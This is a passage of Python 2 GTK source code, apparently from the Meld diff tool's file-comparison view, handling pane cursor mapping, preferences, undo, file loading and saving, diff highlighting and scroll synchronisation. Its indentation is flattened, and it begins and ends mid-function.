cur_chunk = self.linediffer.get_chunk(chunk, pane, new_pane)
if cur_chunk is None:
cur_chunk = self._synth_chunk(pane, new_pane, line)
cur_start, cur_end, new_start, new_end = cur_chunk[1:5]
# If the new buffer's current cursor is already in the correct chunk,
# assume that we have in-progress editing, and don't move it.
cursor_it = new_buf.get_iter_at_mark(new_buf.get_insert())
cursor_line = cursor_it.get_line()
cursor_chunk, _, _ = self.linediffer.locate_chunk(new_pane, cursor_line)
if cursor_chunk is not None:
already_in_chunk = cursor_chunk == chunk
else:
cursor_chunk = self._synth_chunk(pane, new_pane, cursor_line)
already_in_chunk = cursor_chunk[3] == new_start and \
cursor_chunk[4] == new_end
if already_in_chunk:
new_line = cursor_line
else:
# Guess where to put the cursor: in the same chunk, at about the
# same place within the chunk, calculated proportionally by line.
# Insert chunks and one-line chunks are placed at the top.
if cur_end == cur_start:
chunk_offset = 0.0
else:
chunk_offset = (line - cur_start) / float(cur_end - cur_start)
new_line = new_start + int(chunk_offset * (new_end - new_start))
return new_line
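    # Illustrative walk-through of the proportional mapping above (values are
    # hypothetical, not taken from any real diff): if the current chunk spans
    # lines 10-20 in the source pane and lines 30-35 in the target pane, a
    # cursor on line 15 gives chunk_offset = (15 - 10) / 10.0 = 0.5, so the
    # cursor lands at new_line = 30 + int(0.5 * 5) = 32.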
def action_cycle_documents(self, widget):
pane = self._get_focused_pane()
new_pane = (pane + 1) % self.num_panes
chunk, line = self.cursor.chunk, self.cursor.line
new_line = self._corresponding_chunk_line(chunk, line, pane, new_pane)
new_buf = self.textbuffer[new_pane]
self.textview[new_pane].grab_focus()
new_buf.place_cursor(new_buf.get_iter_at_line(new_line))
self.textview[new_pane].scroll_to_mark(new_buf.get_insert(), 0.1)
def on_textview_focus_in_event(self, view, event):
self.textview_focussed = view
self.findbar.textview = view
self.on_cursor_position_changed(view.get_buffer(), None, True)
self._set_merge_action_sensitivity()
def _after_text_modified(self, buffer, startline, sizechange):
if self.num_panes > 1:
pane = self.textbuffer.index(buffer)
self.linediffer.change_sequence(pane, startline, sizechange,
self.buffer_filtered)
# FIXME: diff-changed signal for the current buffer would be cleaner
focused_pane = self._get_focused_pane()
if focused_pane != -1:
self.on_cursor_position_changed(self.textbuffer[focused_pane],
None, True)
self.update_highlighting()
self.queue_draw()
def _filter_text(self, txt):
def killit(m):
assert m.group().count("\n") == 0
if len(m.groups()):
s = m.group()
for g in m.groups():
if g:
s = s.replace(g,"")
return s
else:
return ""
try:
for filt in self.text_filters:
if filt.active:
txt = filt.filter.sub(killit, txt)
except AssertionError:
if not self.warned_bad_comparison:
misc.run_dialog(_("Filter '%s' changed the number of lines in the file. "
"Comparison will be incorrect. See the user manual for more details.") % filt.label)
self.warned_bad_comparison = True
return txt
def after_text_insert_text(self, buf, it, newtext, textlen):
start_mark = buf.get_mark("insertion-start")
starting_at = buf.get_iter_at_mark(start_mark).get_line()
buf.delete_mark(start_mark)
lines_added = it.get_line() - starting_at
self._after_text_modified(buf, starting_at, lines_added)
def after_text_delete_range(self, buffer, it0, it1):
starting_at = it0.get_line()
assert self.deleted_lines_pending != -1
self._after_text_modified(buffer, starting_at, -self.deleted_lines_pending)
self.deleted_lines_pending = -1
def load_font(self):
fontdesc = pango.FontDescription(self.prefs.get_current_font())
context = self.textview0.get_pango_context()
metrics = context.get_metrics( fontdesc, context.get_language() )
self.pixels_per_line = (metrics.get_ascent() + metrics.get_descent()) / 1024
self.pango_char_width = metrics.get_approximate_char_width()
tabs = pango.TabArray(10, 0)
tab_size = self.prefs.tab_size
for i in range(10):
tabs.set_tab(i, pango.TAB_LEFT, i*tab_size*self.pango_char_width)
for i in range(3):
self.textview[i].modify_font(fontdesc)
self.textview[i].set_tabs(tabs)
for i in range(2):
self.linkmap[i].queue_draw()
def on_preference_changed(self, key, value):
if key == "tab_size":
tabs = pango.TabArray(10, 0)
for i in range(10):
tabs.set_tab(i, pango.TAB_LEFT, i*value*self.pango_char_width)
for i in range(3):
self.textview[i].set_tabs(tabs)
for t in self.textview:
srcviewer.set_tab_width(t, value)
elif key == "use_custom_font" or key == "custom_font":
self.load_font()
elif key == "show_line_numbers":
for t in self.textview:
t.set_show_line_numbers( value )
elif key == "show_whitespace":
spaces_flag = srcviewer.spaces_flag if value else 0
for v in self.textview:
v.set_draw_spaces(spaces_flag)
elif key == "use_syntax_highlighting":
for i in range(self.num_panes):
srcviewer.set_highlight_syntax(self.textbuffer[i], value)
elif key == "edit_wrap_lines":
for t in self.textview:
t.set_wrap_mode(self.prefs.edit_wrap_lines)
# FIXME: On changing wrap mode, we get one redraw using cached
# coordinates, followed by a second redraw (e.g., on refocus) with
# correct coordinates. Overly-aggressive textview lazy calculation?
self.diffmap0.queue_draw()
self.diffmap1.queue_draw()
elif key == "spaces_instead_of_tabs":
for t in self.textview:
t.set_insert_spaces_instead_of_tabs(value)
elif key == "ignore_blank_lines":
self.linediffer.ignore_blanks = self.prefs.ignore_blank_lines
self.refresh_comparison()
def on_key_press_event(self, object, event):
x = self.keylookup.get(event.keyval, 0)
if self.keymask | x != self.keymask:
self.keymask |= x
elif event.keyval == gtk.keysyms.Escape:
self.findbar.hide()
def on_key_release_event(self, object, event):
x = self.keylookup.get(event.keyval, 0)
if self.keymask & ~x != self.keymask:
self.keymask &= ~x
# Ugly workaround for bgo#584342
elif event.keyval == gtk.keysyms.ISO_Prev_Group:
self.keymask = 0
def _get_pane_label(self, i):
#TRANSLATORS: this is the name of a new file which has not yet been saved
return self.bufferdata[i].label or _("<unnamed>")
def on_delete_event(self, appquit=0):
response = gtk.RESPONSE_OK
modified = [b.modified for b in self.bufferdata]
if 1 in modified:
dialog = gnomeglade.Component(paths.ui_dir("filediff.ui"), "closedialog")
dialog.widget.set_transient_for(self.widget.get_toplevel())
buttons = []
for i in range(self.num_panes):
b = gtk.CheckButton( self._get_pane_label(i) )
b.set_use_underline(False)
buttons.append(b)
dialog.box.pack_start(b, 1, 1)
if not modified[i]:
b.set_sensitive(0)
else:
b.set_active(1)
dialog.box.show_all()
response = dialog.widget.run()
try_save = [ b.get_active() for b in buttons]
dialog.widget.destroy()
if response==gtk.RESPONSE_OK:
for i in range(self.num_panes):
if try_save[i]:
if not self.save_file(i):
return gtk.RESPONSE_CANCEL
elif response == gtk.RESPONSE_DELETE_EVENT:
response = gtk.RESPONSE_CANCEL
return response
#
# text buffer undo/redo
#
def on_textbuffer__begin_user_action(self, *buffer):
self.undosequence.begin_group()
def on_textbuffer__end_user_action(self, *buffer):
self.undosequence.end_group()
self.update_highlighting()
def on_text_insert_text(self, buf, it, text, textlen):
text = unicode(text, 'utf8')
self.undosequence.add_action(
BufferInsertionAction(buf, it.get_offset(), text))
buf.create_mark("insertion-start", it, True)
def on_text_delete_range(self, buf, it0, it1):
text = unicode(buf.get_text(it0, it1, False), 'utf8')
assert self.deleted_lines_pending == -1
self.deleted_lines_pending = it1.get_line() - it0.get_line()
self.undosequence.add_action(
BufferDeletionAction(buf, it0.get_offset(), text))
def on_undo_checkpointed(self, undosequence, buf, checkpointed):
self.set_buffer_modified(buf, not checkpointed)
#
#
#
def open_external(self):
pane = self._get_focused_pane()
if pane >= 0:
if self.bufferdata[pane].filename:
self._open_files([self.bufferdata[pane].filename])
def get_selected_text(self):
"""Returns selected text of active pane"""
pane = self._get_focused_pane()
if pane != -1:
buf = self.textbuffer[pane]
sel = buf.get_selection_bounds()
if sel:
return unicode(buf.get_text(sel[0], sel[1], False), 'utf8')
return None
def on_find_activate(self, *args):
self.findbar.start_find( self.textview_focussed )
self.keymask = 0
def on_replace_activate(self, *args):
self.findbar.start_replace( self.textview_focussed )
self.keymask = 0
def on_find_next_activate(self, *args):
self.findbar.start_find_next(self.textview_focussed)
def on_find_previous_activate(self, *args):
self.findbar.start_find_previous(self.textview_focussed)
def on_filediff__key_press_event(self, entry, event):
if event.keyval == gtk.keysyms.Escape:
self.findbar.hide()
def on_scrolledwindow__size_allocate(self, scrolledwindow, allocation):
index = self.scrolledwindow.index(scrolledwindow)
if index == 0 or index == 1:
self.linkmap[0].queue_draw()
if index == 1 or index == 2:
self.linkmap[1].queue_draw()
def on_textview_popup_menu(self, textview):
self.popup_menu.popup(None, None, None, 0,
gtk.get_current_event_time())
return True
def on_textview_button_press_event(self, textview, event):
if event.button == 3:
textview.grab_focus()
self.popup_menu.popup(None, None, None, event.button, event.time)
return True
return False
def on_textview_toggle_overwrite(self, view):
self.textview_overwrite = not self.textview_overwrite
for v,h in zip(self.textview, self.textview_overwrite_handlers):
v.disconnect(h)
if v != view:
v.emit("toggle-overwrite")
self.textview_overwrite_handlers = [ t.connect("toggle-overwrite", self.on_textview_toggle_overwrite) for t in self.textview ]
self.on_cursor_position_changed(view.get_buffer(), None, True)
#
# text buffer loading/saving
#
def set_labels(self, lst):
assert len(lst) <= len(self.bufferdata)
for l,d in zip(lst,self.bufferdata):
if len(l): d.label = l
def set_merge_output_file(self, filename):
if len(self.bufferdata) < 2:
return
self.bufferdata[1].savefile = os.path.abspath(filename)
def recompute_label(self):
filenames = []
for i in range(self.num_panes):
filenames.append( self._get_pane_label(i) )
shortnames = misc.shorten_names(*filenames)
for i in range(self.num_panes):
stock = None
if self.bufferdata[i].modified == 1:
shortnames[i] += "*"
if self.bufferdata[i].writable == 1:
stock = gtk.STOCK_SAVE
else:
stock = gtk.STOCK_SAVE_AS
elif self.bufferdata[i].writable == 0:
stock = gtk.STOCK_NO
if stock:
self.statusimage[i].show()
self.statusimage[i].set_from_stock(stock, gtk.ICON_SIZE_BUTTON)
self.statusimage[i].set_size_request(self.diffmap[0].size_request()[0],-1)
else:
self.statusimage[i].hide()
self.label_text = " : ".join(shortnames)
self.tooltip_text = self.label_text
self.label_changed()
def set_files(self, files):
"""Set num panes to len(files) and load each file given.
If an element is None, the text of a pane is left as is.
"""
self._disconnect_buffer_handlers()
self._inline_cache = set()
for i,f in enumerate(files):
if f:
self.textbuffer[i].delete(*self.textbuffer[i].get_bounds())
absfile = os.path.abspath(f)
self.fileentry[i].set_filename(absfile)
self.fileentry[i].prepend_history(absfile)
bold, bnew = self.bufferdata[i], MeldBufferData(absfile)
if bold.filename == bnew.filename:
bnew.label = bold.label
self.bufferdata[i] = bnew
self.msgarea_mgr[i].clear()
self.recompute_label()
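        # NB: the boolean index below selects pane 1 when at least two files
        # are loaded (True indexes as 1) and pane 0 otherwise.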
self.textview[len(files) >= 2].grab_focus()
self._connect_buffer_handlers()
self.scheduler.add_task( self._set_files_internal(files).next )
def _load_files(self, files, textbuffers):
self.undosequence.clear()
yield _("[%s] Set num panes") % self.label_text
self.set_num_panes( len(files) )
self._disconnect_buffer_handlers()
self.linediffer.clear()
self.queue_draw()
try_codecs = self.prefs.text_codecs.split() or ['utf_8', 'utf_16']
yield _("[%s] Opening files") % self.label_text
tasks = []
def add_dismissable_msg(pane, icon, primary, secondary):
msgarea = self.msgarea_mgr[pane].new_from_text_and_icon(
icon, primary, secondary)
button = msgarea.add_stock_button_with_text(_("Hi_de"),
gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE)
msgarea.connect("response",
lambda *args: self.msgarea_mgr[pane].clear())
msgarea.show_all()
return msgarea
for pane, filename in enumerate(files):
buf = textbuffers[pane]
if filename:
try:
handle = codecs.open(filename, "rU", try_codecs[0])
task = TaskEntry(filename, handle, buf, try_codecs[:],
pane, False)
tasks.append(task)
except (IOError, LookupError), e:
buf.delete(*buf.get_bounds())
add_dismissable_msg(pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"), str(e))
yield _("[%s] Reading files") % self.label_text
while len(tasks):
for t in tasks[:]:
try:
nextbit = t.file.read(4096)
if nextbit.find("\x00") != -1:
t.buf.delete(*t.buf.get_bounds())
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"),
_("%s appears to be a binary file.") % t.filename)
tasks.remove(t)
except ValueError, err:
t.codec.pop(0)
if len(t.codec):
t.file = codecs.open(t.filename, "rU", t.codec[0])
t.buf.delete( t.buf.get_start_iter(), t.buf.get_end_iter() )
else:
print "codec error fallback", err
t.buf.delete(*t.buf.get_bounds())
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"),
_("%s is not in encodings: %s") %
(t.filename, try_codecs))
tasks.remove(t)
except IOError, ioerr:
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"), str(ioerr))
tasks.remove(t)
else:
# The handling here avoids inserting split CR/LF pairs into
# GtkTextBuffers; this is relevant only when universal
# newline support is unavailable or broken.
if t.was_cr:
nextbit = "\r" + nextbit
t.was_cr = False
if len(nextbit):
if nextbit[-1] == "\r" and len(nextbit) > 1:
t.was_cr = True
nextbit = nextbit[0:-1]
t.buf.insert( t.buf.get_end_iter(), nextbit )
else:
self.set_buffer_writable(t.buf, os.access(t.filename, os.W_OK))
self.bufferdata[t.pane].encoding = t.codec[0]
if hasattr(t.file, "newlines"):
self.bufferdata[t.pane].newlines = t.file.newlines
tasks.remove(t)
yield 1
for b in self.textbuffer:
self.undosequence.checkpoint(b)
def _diff_files(self):
yield _("[%s] Computing differences") % self.label_text
texts = self.buffer_filtered[:self.num_panes]
step = self.linediffer.set_sequences_iter(texts)
while step.next() is None:
yield 1
chunk, prev, next = self.linediffer.locate_chunk(1, 0)
self.cursor.next = chunk
if self.cursor.next is None:
self.cursor.next = next
for buf in self.textbuffer:
buf.place_cursor(buf.get_start_iter())
self.scheduler.add_task(lambda: self.next_diff(gtk.gdk.SCROLL_DOWN), True)
self.queue_draw()
self.update_highlighting()
self._connect_buffer_handlers()
self._set_merge_action_sensitivity()
langs = []
for i in range(self.num_panes):
filename = self.bufferdata[i].filename
if filename:
langs.append(srcviewer.get_language_from_file(filename))
else:
langs.append(None)
# If we have only one identified language then we assume that all of
# the files are actually of that type.
real_langs = [l for l in langs if l]
if real_langs and real_langs.count(real_langs[0]) == len(real_langs):
langs = (real_langs[0],) * len(langs)
for i in range(self.num_panes):
srcviewer.set_language(self.textbuffer[i], langs[i])
srcviewer.set_highlight_syntax(self.textbuffer[i],
self.prefs.use_syntax_highlighting)
yield 0
def _set_files_internal(self, files):
for i in self._load_files(files, self.textbuffer):
yield i
for i in self._diff_files():
yield i
def refresh_comparison(self):
"""Refresh the view by clearing and redoing all comparisons"""
self._disconnect_buffer_handlers()
self._inline_cache = set()
self.linediffer.clear()
self.queue_draw()
self.scheduler.add_task(self._diff_files().next)
def _set_merge_action_sensitivity(self):
pane = self._get_focused_pane()
editable = self.textview[pane].get_editable()
mergeable = self.linediffer.has_mergeable_changes(pane)
self.actiongroup.get_action("MergeFromLeft").set_sensitive(mergeable[0] and editable)
self.actiongroup.get_action("MergeFromRight").set_sensitive(mergeable[1] and editable)
if self.num_panes == 3 and self.textview[1].get_editable():
mergeable = self.linediffer.has_mergeable_changes(1)
else:
mergeable = (False, False)
self.actiongroup.get_action("MergeAll").set_sensitive(mergeable[0] or mergeable[1])
def on_diffs_changed(self, linediffer):
self._set_merge_action_sensitivity()
if self.linediffer.sequences_identical():
error_message = True in [m.has_message() for m in self.msgarea_mgr]
if self.num_panes == 1 or error_message:
return
for index, mgr in enumerate(self.msgarea_mgr):
secondary_text = None
# TODO: Currently this only checks to see whether text filters
# are active, and may be altering the comparison. It would be
# better if we only showed this message if the filters *did*
# change the text in question.
active_filters = any([f.active for f in self.text_filters])
if active_filters:
secondary_text = _("Text filters are being used, and may "
"be masking differences between files. "
"Would you like to compare the "
"unfiltered files?")
msgarea = mgr.new_from_text_and_icon(gtk.STOCK_INFO,
_("Files are identical"),
secondary_text)
mgr.set_msg_id(FileDiff.MSG_SAME)
button = msgarea.add_stock_button_with_text(_("Hide"),
gtk.STOCK_CLOSE,
gtk.RESPONSE_CLOSE)
if index == 0:
button.props.label = _("Hi_de")
if active_filters:
msgarea.add_button(_("Show without filters"),
gtk.RESPONSE_OK)
msgarea.connect("response", self.on_msgarea_identical_response)
msgarea.show_all()
else:
for m in self.msgarea_mgr:
if m.get_msg_id() == FileDiff.MSG_SAME:
m.clear()
def on_msgarea_identical_response(self, msgarea, respid):
for mgr in self.msgarea_mgr:
mgr.clear()
if respid == gtk.RESPONSE_OK:
self.text_filters = []
self.refresh_comparison()
def update_highlighting(self):
if not self.undosequence.in_grouped_action():
self.scheduler.add_task(self._update_highlighting().next)
def _update_highlighting(self):
alltexts = self.buffer_texts
alltags = [b.get_tag_table().lookup("inline") for b in self.textbuffer]
progress = [b.create_mark("progress", b.get_start_iter()) for b in self.textbuffer]
newcache = set()
for chunk in self.linediffer.all_changes():
for i,c in enumerate(chunk):
if c and c[0] == "replace":
bufs = self.textbuffer[1], self.textbuffer[i*2]
tags = alltags[1], alltags[i*2]
cacheitem = (i, c, tuple(alltexts[1][c[1]:c[2]]), tuple(alltexts[i*2][c[3]:c[4]]))
newcache.add(cacheitem)
# Clean interim chunks
starts = [get_iter_at_line_or_eof(b, l) for b, l in zip(bufs, (c[1], c[3]))]
prog_it0 = bufs[0].get_iter_at_mark(progress[1])
prog_it1 = bufs[1].get_iter_at_mark(progress[i * 2])
bufs[0].remove_tag(tags[0], prog_it0, starts[0])
bufs[1].remove_tag(tags[1], prog_it1, starts[1])
bufs[0].move_mark(progress[1], get_iter_at_line_or_eof(bufs[0], c[2]))
bufs[1].move_mark(progress[i * 2], get_iter_at_line_or_eof(bufs[1], c[4]))
if cacheitem in self._inline_cache:
continue
ends = [get_iter_at_line_or_eof(b, l) for b, l in zip(bufs, (c[2], c[4]))]
bufs[0].remove_tag(tags[0], starts[0], ends[0])
bufs[1].remove_tag(tags[1], starts[1], ends[1])
# We don't use self.buffer_texts here, as removing line
# breaks messes with inline highlighting in CRLF cases
text1 = bufs[0].get_text(starts[0], ends[0], False)
text1 = unicode(text1, 'utf8')
textn = bufs[1].get_text(starts[1], ends[1], False)
textn = unicode(textn, 'utf8')
# For very long sequences, bail rather than trying a very slow comparison
inline_limit = 8000 # arbitrary constant
if len(text1) + len(textn) > inline_limit:
for i in range(2):
bufs[i].apply_tag(tags[i], starts[i], ends[i])
continue
#print "<<<\n%s\n---\n%s\n>>>" % (text1, textn)
back = (0,0)
for o in self._cached_match(text1, textn):
if o[0] == "equal":
if (o[2]-o[1] < 3) or (o[4]-o[3] < 3):
back = o[4]-o[3], o[2]-o[1]
continue
for i in range(2):
s,e = starts[i].copy(), starts[i].copy()
s.forward_chars( o[1+2*i] - back[i] )
e.forward_chars( o[2+2*i] )
bufs[i].apply_tag(tags[i], s, e)
back = (0,0)
yield 1
# Clean up trailing lines
prog_it = [b.get_iter_at_mark(p) for b, p in zip(self.textbuffer, progress)]
for b, tag, start in zip(self.textbuffer, alltags, prog_it):
b.remove_tag(tag, start, b.get_end_iter())
self._inline_cache = newcache
self._cached_match.clean(len(self._inline_cache))
def on_textview_expose_event(self, textview, event):
if self.num_panes == 1:
return
if event.window != textview.get_window(gtk.TEXT_WINDOW_TEXT) \
and event.window != textview.get_window(gtk.TEXT_WINDOW_LEFT):
return
# Hack to redraw the line number gutter used by post-2.10 GtkSourceView
if event.window == textview.get_window(gtk.TEXT_WINDOW_LEFT) and \
self.in_nested_textview_gutter_expose:
self.in_nested_textview_gutter_expose = False
return
visible = textview.get_visible_rect()
pane = self.textview.index(textview)
area = event.area
x, y = textview.window_to_buffer_coords(gtk.TEXT_WINDOW_WIDGET,
area.x, area.y)
bounds = (textview.get_line_num_for_y(y),
textview.get_line_num_for_y(y + area.height + 1))
width, height = textview.allocation.width, textview.allocation.height
context = event.window.cairo_create()
context.rectangle(area.x, area.y, area.width, area.height)
context.clip()
context.set_line_width(1.0)
for change in self.linediffer.single_changes(pane, bounds):
ypos0 = textview.get_y_for_line_num(change[1]) - visible.y
ypos1 = textview.get_y_for_line_num(change[2]) - visible.y
context.rectangle(-0.5, ypos0 - 0.5, width + 1, ypos1 - ypos0)
if change[1] != change[2]:
context.set_source_rgb(*self.fill_colors[change[0]])
context.fill_preserve()
if self.linediffer.locate_chunk(pane, change[1])[0] == self.cursor.chunk:
context.set_source_rgba(1.0, 1.0, 1.0, 0.5)
context.fill_preserve()
context.set_source_rgb(*self.line_colors[change[0]])
context.stroke()
if textview.is_focus() and self.cursor.line is not None:
it = self.textbuffer[pane].get_iter_at_line(self.cursor.line)
ypos, line_height = self.textview[pane].get_line_yrange(it)
context.set_source_rgba(1, 1, 0, .25)
context.rectangle(0, ypos - visible.y, width, line_height)
context.fill()
current_time = glib.get_current_time()
new_anim_chunks = []
for c in self.animating_chunks[pane]:
percent = min(1.0, (current_time - c.start_time) / c.duration)
rgba_pairs = zip(c.start_rgba, c.end_rgba)
rgba = [s + (e - s) * percent for s, e in rgba_pairs]
it = self.textbuffer[pane].get_iter_at_mark(c.start_mark)
ystart, _ = self.textview[pane].get_line_yrange(it)
it = self.textbuffer[pane].get_iter_at_mark(c.end_mark)
yend, _ = self.textview[pane].get_line_yrange(it)
if ystart == yend:
ystart -= 1
context.set_source_rgba(*rgba)
context.rectangle(0, ystart - visible.y, width, yend - ystart)
context.fill()
if current_time <= c.start_time + c.duration:
new_anim_chunks.append(c)
else:
self.textbuffer[pane].delete_mark(c.start_mark)
self.textbuffer[pane].delete_mark(c.end_mark)
self.animating_chunks[pane] = new_anim_chunks
if self.animating_chunks[pane] and self.anim_source_id[pane] is None:
def anim_cb():
textview.queue_draw()
return True
# Using timeout_add interferes with recalculation of inline
# highlighting; this mechanism could be improved.
self.anim_source_id[pane] = gobject.idle_add(anim_cb)
elif not self.animating_chunks[pane] and self.anim_source_id[pane]:
gobject.source_remove(self.anim_source_id[pane])
self.anim_source_id[pane] = None
if event.window == textview.get_window(gtk.TEXT_WINDOW_LEFT):
self.in_nested_textview_gutter_expose = True
textview.emit("expose-event", event)
def _get_filename_for_saving(self, title ):
dialog = gtk.FileChooserDialog(title,
parent=self.widget.get_toplevel(),
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OK, gtk.RESPONSE_OK) )
dialog.set_default_response(gtk.RESPONSE_OK)
response = dialog.run()
filename = None
if response == gtk.RESPONSE_OK:
filename = dialog.get_filename()
dialog.destroy()
if filename:
if os.path.exists(filename):
response = misc.run_dialog(
_('"%s" exists!\nOverwrite?') % os.path.basename(filename),
parent = self,
buttonstype = gtk.BUTTONS_YES_NO)
if response == gtk.RESPONSE_NO:
return None
return filename
return None
def _save_text_to_filename(self, filename, text):
try:
open(filename, "wb").write(text)
except IOError, e:
misc.run_dialog(
_("Error writing to %s\n\n%s.") % (filename, e),
self, gtk.MESSAGE_ERROR, gtk.BUTTONS_OK)
return False
return True
def save_file(self, pane, saveas=0):
buf = self.textbuffer[pane]
bufdata = self.bufferdata[pane]
if saveas or not bufdata.filename:
filename = self._get_filename_for_saving( _("Choose a name for buffer %i.") % (pane+1) )
if filename:
bufdata.filename = bufdata.label = os.path.abspath(filename)
self.fileentry[pane].set_filename( bufdata.filename)
self.fileentry[pane].prepend_history(bufdata.filename)
else:
return False
start, end = buf.get_bounds()
text = unicode(buf.get_text(start, end, False), 'utf8')
if bufdata.newlines:
if type(bufdata.newlines) == type(""):
                if bufdata.newlines != '\n':
text = text.replace("\n", bufdata.newlines)
elif type(bufdata.newlines) == type(()):
buttons = {'\n':("UNIX (LF)",0), '\r\n':("DOS (CR-LF)", 1), '\r':("MAC (CR)",2) }
newline = misc.run_dialog( _("This file '%s' contains a mixture of line endings.\n\nWhich format would you like to use?") % bufdata.label,
self, gtk.MESSAGE_WARNING, buttonstype=gtk.BUTTONS_CANCEL,
extrabuttons=[ buttons[b] for b in bufdata.newlines ] )
if newline < 0:
return
for k,v in buttons.items():
if v[1] == newline:
bufdata.newlines = k
if k != '\n':
text = text.replace('\n', k)
break
if bufdata.encoding:
try:
text = text.encode(bufdata.encoding)
except UnicodeEncodeError:
if misc.run_dialog(
_("'%s' contains characters not encodable with '%s'\nWould you like to save as UTF-8?") % (bufdata.label, bufdata.encoding),
self, gtk.MESSAGE_ERROR, gtk.BUTTONS_YES_NO) != gtk.RESPONSE_YES:
return False
save_to = bufdata.savefile or bufdata.filename
if self._save_text_to_filename(save_to, text):
self.emit("file-changed", save_to)
self.undosequence.checkpoint(buf)
return True
else:
return False
def make_patch(self, *extra):
dialog = patchdialog.PatchDialog(self)
dialog.run()
def set_buffer_writable(self, buf, yesno):
pane = self.textbuffer.index(buf)
self.bufferdata[pane].writable = yesno
self.recompute_label()
def set_buffer_modified(self, buf, yesno):
pane = self.textbuffer.index(buf)
self.bufferdata[pane].modified = yesno
self.recompute_label()
def save(self):
pane = self._get_focused_pane()
if pane >= 0:
self.save_file(pane)
def save_as(self):
pane = self._get_focused_pane()
if pane >= 0:
self.save_file(pane, True)
def save_all(self):
for i in range(self.num_panes):
if self.bufferdata[i].modified:
self.save_file(i)
def on_fileentry_activate(self, entry):
if self.on_delete_event() != gtk.RESPONSE_CANCEL:
files = [e.get_full_path() for e in self.fileentry[:self.num_panes]]
self.set_files(files)
return 1
def _get_focused_pane(self):
for i in range(self.num_panes):
if self.textview[i].is_focus():
return i
return -1
#
# refresh and reload
#
def on_reload_activate(self, *extra):
modified = [os.path.basename(b.label) for b in self.bufferdata if b.modified]
if len(modified):
message = _("Reloading will discard changes in:\n%s\n\nYou cannot undo this operation.") % "\n".join(modified)
response = misc.run_dialog( message, parent=self, messagetype=gtk.MESSAGE_WARNING, buttonstype=gtk.BUTTONS_OK_CANCEL)
if response != gtk.RESPONSE_OK:
return
files = [b.filename for b in self.bufferdata[:self.num_panes] ]
self.set_files(files)
def on_refresh_activate(self, *extra):
self.refresh_comparison()
def queue_draw(self, junk=None):
for t in self.textview:
t.queue_draw()
for i in range(self.num_panes-1):
self.linkmap[i].queue_draw()
self.diffmap0.queue_draw()
self.diffmap1.queue_draw()
def on_action_lock_scrolling_toggled(self, action):
self.toggle_scroll_lock(action.get_active())
def on_lock_button_toggled(self, button):
self.toggle_scroll_lock(not button.get_active())
def toggle_scroll_lock(self, locked):
icon_name = "meld-locked" if locked else "meld-unlocked"
self.lock_button_image.props.icon_name = icon_name
self.lock_button.set_active(not locked)
self.actiongroup.get_action("LockScrolling").set_active(locked)
self._scroll_lock = not locked
#
# scrollbars
#
def _sync_hscroll(self, adjustment):
if self._sync_hscroll_lock or self._scroll_lock:
return
self._sync_hscroll_lock = True
val = adjustment.get_value()
for sw in self.scrolledwindow[:self.num_panes]:
adj = sw.get_hadjustment()
if adj is not adjustment:
adj.set_value(val)
self._sync_hscroll_lock = False
def _sync_vscroll(self, adjustment, master):
# only allow one scrollbar to be here at a time
if self._sync_vscroll_lock:
return
if not self._scroll_lock and (self.keymask & MASK_SHIFT) == 0:
self._sync_vscroll_lock = True
syncpoint = 0.5
# the line to search for in the 'master' text
master_y = adjustment.value + adjustment.page_size * syncpoint
it = self.textview[master].get_line_at_y(int(master_y))[0]
line_y, height = self.textview[master].get_line_yrange(it)
line = it.get_line() + ((master_y-line_y)/height)
# scrollbar influence 0->1->2 or 0<-1->2 or 0<-1<-2
scrollbar_influence = ((1, 2), (0, 2), (1, 0))
for i in scrollbar_influence[master][:self.num_panes - 1]:
adj = self.scrolledwindow[i].get_vadjustment()
mbegin, mend = 0, self.textbuffer[master].get_line_count()
obegin, oend = 0, self.textbuffer[i].get_line_count()
# look for the chunk containing 'line'
for c in self.linediffer.pair_changes(master, i):
if c[1] >= line:
mend = c[1]
oend = c[3]
break
elif c[2] >= line:
mbegin, mend = c[1], c[2]
obegin, oend = c[3], c[4]
break
else:
mbegin = c[2]
obegin = c[4]
fraction = (line - mbegin) / ((mend - mbegin) or 1)
other_line = (obegin + fraction * (oend - obegin))
it = self.textbuffer[i].get_iter_at_line(int(other_line))
val, height = self.textview[i].get_line_yrange(it)
val -= (adj.page_size) * syncpoint
val += (other_line-int(other_line)) * height
val = min(max(val, adj.lower), adj.upper - adj.page_size)
adj.set_value( val )
# If we just changed the central bar, make it the master
if i == 1:
master, line = 1, other_line
self._sync_vscroll_lock = False
for lm in self.linkmap:
if lm.window:
lm.window.invalidate_rect(None, True)
lm.window.process_updates(True)
def set_num_panes(self, n):
if n != self.num_panes and n in (1,2,3):
self.num_panes = n
toshow = self.scrolledwindow[:n] + self.fileentry[:n]
toshow += self.vbox[:n] + self.msgarea_mgr[:n]
toshow += self.linkmap[:n-1] + self.diffmap[:n]
map( lambda x: x.show(), toshow )
tohide = self.statusimage + self.scrolledwindow[n:] + self.fileentry[n:]
tohide += self.vbox[n:] + self.msgarea_mgr[n:]
tohide += self.linkmap[n-1:] + self.diffmap[n:]
map( lambda x: x.hide(), tohide )
self.actiongroup.get_action("MakePatch").set_sensitive(n > 1)
self.actiongroup.get_action("CycleDocuments").set_sensitive(n > 1)
def coords_iter(i):
buf_index = 2 if i == 1 and self.num_panes == 3 else i
get_end_iter = self.textbuffer[buf_index].get_end_iter
get_iter_at_line = self.textbuffer[buf_index].get_iter_at_line
get_line_yrange = self.textview[buf_index].get_line_yrange
def coords_by_chunk():
y, h = get_line_yrange(get_end_iter())
max_y = float(y + h)
for c in self.linediffer.single_changes(i):
y0, _ = get_line_yrange(get_iter_at_line(c[1]))
if c[1] == c[2]:
y, h = y0, 0
else:
y, h = get_line_yrange(get_iter_at_line(c[2] - 1))
yield c[0], y0 / max_y, (y + h) / max_y
return coords_by_chunk
colour_map = {
"conflict": (1.0, 0.75294117647058822, 0.79607843137254897),
"insert": (0.75686274509803919, 1.0, 0.75686274509803919),
"replace": (0.8666666666666667, 0.93333333333333335, 1.0),
"delete": (0.75686274509803919, 1.0, 0.75686274509803919)
}
for (w, i) in zip(self.diffmap, (0, self.num_panes - 1)):
scroll = self.scrolledwindow[i].get_vscrollbar()
